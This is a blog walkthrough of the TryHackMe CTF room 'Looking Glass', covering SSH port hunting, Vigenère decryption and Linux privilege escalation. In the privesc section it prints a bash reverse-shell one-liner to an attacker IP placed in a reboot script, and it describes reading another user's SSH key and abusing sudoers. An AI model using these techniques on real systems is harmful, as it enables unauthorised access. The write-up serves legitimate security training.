Open in app

Sign in

Write

Sign in

WriteUp — THM Looking Glass

Jari Laurila
5 min readOct 25, 2020

--

Step through the looking glass. A sequel to the Wonderland challenge room.

This is a writeup for TryHackMe room Looking Glass. My writeup for the first part of the Lewis Carrol themed series can be found here.

By John Tenniel — Through the Looking-Glass, Public Domain, https://commons.wikimedia.org/w/index.php?curid=7592577

Reconnaissance

Start with nmap scan to see open ports and services. It reveals a ton of open ports which are identified as SSH. Need to check the ports individually so dump them into a file.

nmap --open lookingglass.thm | grep /tcp | cut -d '/' -f1 > ports.txt

Try to get something with HTTP:

while read p; do 
  curl http://lookingglass.thm:$p
done < ports.txt

Every port replies with:

curl: (1) Received HTTP/0.9 when not allowed

So let’s try SSH:

ssh -o “StrictHostKeyChecking=no” lookingglass.thm -p 11111
Warning: Permanently added ‘[lookingglass.thm]:11111,[10.10.40.255]:11111’ (RSA) to the list of known hosts.
Higher

That’s an unusual reply. Maybe I need to find the right port? Let’s try with the highest port:

ssh -o "StrictHostKeyChecking=no" lookingglass.thm -p 13783
Higher
Connection to lookingglass.thm closed.

What about the lowest port?

ssh -o “StrictHostKeyChecking=no” lookingglass.thm -p 9000 
Lower
Connection to lookingglass.thm closed.

Maybe the instructions are reversed? Let’s find the right port by testing with binary search algorithm. I also found out that you need to also use ports not in the nmap scan and eventually arrive at the right port (it is different for each box):

ssh -o “StrictHostKeyChecking=no” lookingglass.thm -p 10569
Warning: Permanently added ‘[lookingglass.thm]:10569,[10.10.40.255]:10569’ (RSA) to the list of known hosts.
You’ve found the real service.
Solve the challenge to get access to the box
Jabberwocky
‘Mdes mgplmmz, cvs alv lsmtsn aowil
Fqs ncix hrd rxtbmi bp bwl arul;
Elw bpmtc pgzt alv uvvordcet,
Egf bwl qffl vaewz ovxztiql.‘Fvphve ewl Jbfugzlvgb, ff woy!
Ioe kepu bwhx sbai, tst jlbal vppa grmjl!
Bplhrf xag Rjinlu imro, pud tlnp
Bwl jintmofh Iaohxtachxta!’Oi tzdr hjw oqzehp jpvvd tc oaoh:
Eqvv amdx ale xpuxpqx hwt oi jhbkhe — 
Hv rfwmgl wl fp moi Tfbaun xkgm,
Puh jmvsd lloimi bp bwvyxaa.Eno pz io yyhqho xyhbkhe wl sushf,
Bwl Nruiirhdjk, xmmj mnlw fy mpaxt,
Jani pjqumpzgn xhcdbgi xag bjskvr dsoo,
Pud cykdttk ej ba gaxt!Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh
Ewl vpvict qseux dine huidoxt-achgb!
Al peqi pt eitf, ick azmo mtd wlae
Lx ymca krebqpsxug cevm.‘Ick lrla xhzj zlbmg vpt Qesulvwzrr?
Cpqx vw bf eifz, qy mthmjwa dwn!
V jitinofh kaz! Gtntdvl! Ttspaj!’
Wl ciskvttk me apw jzn.‘Awbw utqasmx, tuh tst zljxaa bdcij
Wph gjgl aoh zkuqsi zg ale hpie;
Bpe oqbzc nxyi tst iosszqdtz,
Eew ale xdte semja dbxxkhfe.
Jdbr tivtmi pw sxderpIoeKeudmgdstd

Gaining access

This must be Jabberwocky poem from the Trough the Looking-Glass book. Comparing the second word in the poem “brillig” to ciphertext “mgplmmz” indicates that this is is not a simple monoalphabetic substitution cipher. Let’s try to see if it’s Vigenere cipher an online tool: https://www.dcode.fr/vigenere-cipher

We can use a known plaintext method and select a long word like “Bandersnatch”. This quickly reveals that the text is Vigenere encrypted and the key is “THEALPHABETCIPHER”. Using the same tool the text can be decrypted and it reveals the secret to be “__REDACTED__”. Let’s enter that to the shell question. The program replies with a text before closing the connection:

jabberwock:SidesPracticeWatchedUproar

This password is dynamically created so not a spoiler showing it here. I test logging in with SSH and these credentials and gain access as jabberwock. User flag is reversed so I get the right flag using:

rev user.txt
thm{__REDACTED__}

Privesc

I start looking for privilege escalation vectors using linPEAS. Intersting findings:

At reboot a script is executed:

@reboot tweedledum bash /home/jabberwock/twasBrillig.sh

Jabberwock can reboot the system:

User jabberwock may run the following commands on looking-glass:
 (root) NOPASSWD: /sbin/reboot

I can edit the script so to get interactive access I change it to run a reverse shell and reboot the system using sudo.

bash -i >& /dev/tcp/10.8.108.247/4444 0>&1

After the reboot is completed I get a shell as tweedledum. There is an interesting file in his home directory:

cat humptydumpty.txt
dcfff5eb40423f055a4cd0a8d7ed39ff6cb9816868f5766b4088b9e9906961b9
7692c3ad3540bb803c020b3aee66cd8887123234ea0c6e7143c0add73ff431ed
28391d3bc64ec15cbb090426b04aa6b7649c3cc85f11230bb0105e02d15e3624
b808e156d18d1cecdcc1456375f8cae994c36549a07c8c2315b473dd9d7f404f
fa51fd49abf67705d6a35d18218c115ff5633aec1f9ebfdc9d5d4956416f57f6
b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0
5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
7468652070617373776f7264206973207a797877767574737271706f6e6d6c6b

I enter this text to CyberChef and select to convert it from hex. The text is mostly garbled but the last bytes are interesting:

the password is zyxwvutsrqponmlk

I test if I can login as humptydumpty and this password. Doesn’t work with ssh but sudoing in does:

su - humptydumpty

Enumerating as humptydumpty there is another poem in his home directory where Humpty Dumpty is explaing Jabberwocky poem to Alice. Which is good, I was already starting to question my English skills.

Enumerating the system I notice interesting permissions on alice’s home directory:

ls -la
total 32
drwxr-xr-x  8 root         root         4096 Jul  3 01:25 .
drwxr-xr-x 24 root         root         4096 Jul  2 23:24 ..
drwx--x--x  6 alice        alice        4096 Jul  3 02:53 alice
drwx------  4 humptydumpty humptydumpty 4096 Oct 25 09:56 humptydumpty
drwxrwxrwx  5 jabberwock   jabberwock   4096 Oct 25 09:43 jabberwock
drwx------  5 tryhackme    tryhackme    4096 Jul  3 03:00 tryhackme
drwx------  3 tweedledee   tweedledee   4096 Jul  3 02:42 tweedledee
drwx------  2 tweedledum   tweedledum   4096 Jul  3 02:42 tweedledum

I cannot enumerate the directories but what if I try some files like flag.txt, poem.txt etc? I also check for RSA key:

cat /home/alice/.ssh/id_rsa

To my surprise I get the key and it’s not even passphrase protected. I copy the key to a file and login as alice:

ssh -i id_rsa_alice alice@lookingglass.thm

I enumerate system again with linPEAS but don’t find out any escalation vectors. But there must be something about alice so I enumerate files with different parameters: user=alice, group=alice and even grep -Ril “alice” /. Finally I stumble to something useful with:

find / -iname “*alice*” 2>/dev/null
/etc/sudoers.d/alice

looking at this file it is world readable so we can take a look:

cat /etc/sudoers.d/alice 
alice ssalg-gnikool = (root) NOPASSWD: /bin/bash

So there we go!

sudo -h ssalg-gnikool /bin/bash
whoami
root

Now just grab the root flag and we are done! Another very well done room, thank you NinjaJc01! Just need to get Humpty Dumpty rhyme out of my head now…

Cybersecurity
Thm Writeup

--

--

Jari Laurila
Jari Laurila

Written by Jari Laurila

7 Followers
3 Following

CTO by day, learning cybersecurity by night.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams